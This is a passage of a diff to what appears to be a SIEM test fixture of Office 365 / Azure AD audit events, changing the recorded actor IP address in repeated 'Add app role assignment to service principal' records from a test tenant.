\"Value\":\"R5\"}],\"Id\":\"411fc666-cabf-4cb0-b8a3-e5a2cc515b79\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:41\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\",\\\"Name\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:41.8821342Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622751\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",
\"Value\":\"R5\"}],\"Id\":\"411fc666-cabf-4cb0-b8a3-e5a2cc515b79\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ 
@@ -21665,9 +21665,9 @@
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "AzureActiveDirectoryEventType": 1,
- "ClientIP": "83.57.233.151",
+ "ClientIP": "67.43.156.15",
 "CreationTime": "2020-02-11T16:45:41",
 "ExtendedProperties": [
 {
@@ -21901,7 +21901,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:41\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\",\\\"Name\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:41.9571526Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622781\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",
\"Value\":\"R5\"}],\"Id\":\"a4a12952-3467-4d48-9950-48b4b9ac87b3\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:41\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\",\\\"Name\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:41.9571526Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622781\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",
\"Value\":\"R5\"}],\"Id\":\"a4a12952-3467-4d48-9950-48b4b9ac87b3\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ 
@@ -21931,9 +21931,9 @@
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "AzureActiveDirectoryEventType": 1,
- "ClientIP": "83.57.233.151",
+ "ClientIP": "67.43.156.15",
 "CreationTime": "2020-02-11T16:45:41",
 "ExtendedProperties": [
 {
@@ -22167,7 +22167,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:41\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\",\\\"Name\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:41.8821342Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622751\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",
\"Value\":\"R5\"}],\"Id\":\"411fc666-cabf-4cb0-b8a3-e5a2cc515b79\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-